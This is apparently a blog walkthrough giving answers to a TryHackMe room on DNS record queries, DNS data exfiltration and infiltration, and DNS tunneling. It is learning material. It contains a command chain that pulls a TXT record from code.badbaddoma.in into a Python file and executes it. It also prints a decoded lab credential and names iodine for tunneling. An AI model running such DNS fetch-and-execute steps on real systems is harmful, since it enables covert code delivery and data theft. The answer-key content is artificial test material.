TryHackMe | DNS Manipulation Walkthrough

 

Manipulating DNS queries to our advantage

Link- https://tryhackme.com/room/dnsmanipulation


If you were on Windows, what command could you use to query a txt record for ‘youtube.com’?

nslookup -type=txt youtube.com

If you were on Linux, what command could you use to query a txt record for ‘facebook.com’?

dig facebook.com TXT

AAAA stores what type of IP Address along with the hostname?

IPv6

Maximum characters for a DNS TXT Record is 256. (Yay/Nay)

Nay

What DNS Record provides a domain name in reverse-lookup? (Research)

PTR

What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2) (Research)

2.203.168.192.in-addr.arpa

What is the maximum length of a DNS name? (Research) (Length includes dots!)

253

What is the Transaction name? (Type it as you see it)

Network Equip.

How much was the Firewall? (Without the $)

2500

Which file contains suspicious DNS queries?

cap3.pcap

Enter the plain-text after you have decoded the data using packetyGrabber.py found in ~/dns-exfil-infil/ folder.

administrator:s3cre7P@ssword

What type of DNS Record is usually used to infiltrate data into a network?

TXT

Read the TASK file found in the ~/challenges/infiltration/ folder.

Follow the instructions in the TASK file to complete this question.

Enter the output from the executed python file

Run the following commands

nslookup -type=txt code.badbaddoma.in | grep Yee | cut -d \” -f2 > .todecode.py

python3 ~/dns-exfil-infil/packetySimple.py

cat .todecode.py
python3 .todecode.py

4.4.0–186-generic

What program was used to Tunnel HTTP over DNS?

iodine


That’s it!. See you in the next Room :)

Comments

Eonrec

Popular posts from this blog

TryHackMe | Introduction To Honeypots Walkthrough

TryHackMe | DFIR: An Introduction WriteUp

TryHackMe | Intro to Cyber Threat Intel WriteUp